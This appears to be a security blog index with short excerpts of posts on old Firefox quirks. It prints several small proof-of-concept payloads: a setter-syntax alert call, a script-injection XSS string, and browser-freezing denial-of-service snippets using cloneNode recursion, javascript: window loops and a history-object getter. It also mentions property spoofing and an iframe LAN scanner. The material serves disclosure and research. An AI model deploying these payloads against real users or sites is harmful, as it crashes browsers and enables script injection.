Custom setters syntax are being removed from Firefox in the next version.. boo I here you say well at least some of you. If you don’t know Firefox decided it would create it’s own setter syntax (I love it when you do that you know) ages ago and it looked something like this:-
a setter=alert,a=1//calls alert(1)
Whacky [...]
Check this DOS in Firefox:-
<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">
There are many DOM related Firefox problems, this was one of the more interesting ones I found
Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:-
"><script>alert(/XSS PUNCH!/)</script>
Then you can respond with the crouching tab hidden dos move:-
self.location = “javascript:window.open(’javascript:document.clear();
document.open();document.close();self.location=self.location’)”;
This move can frustrate your opponent into submission.
Here’s a complete DOS attack on Firefox using the history object:-
window.onload = function() {
history.__defineGetter__(”x”, function() {
for(i in this) {
try {
alert(this[i]);
} catch(e) {
}
}
});
history.x;
}
Tested on Firefox 2.0.0.9 mac, a window pops up with [...]
I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know ).
There are [...]
For those of you that read my blog you’ll know that I’m not a big fan of iframes for various reasons. I wrote a Javascript/CSS scanner which uses them to scan a local area network. There was no easy way to actually prevent this stuff until now….noscript now has iframe protection which is fantastic news, [...]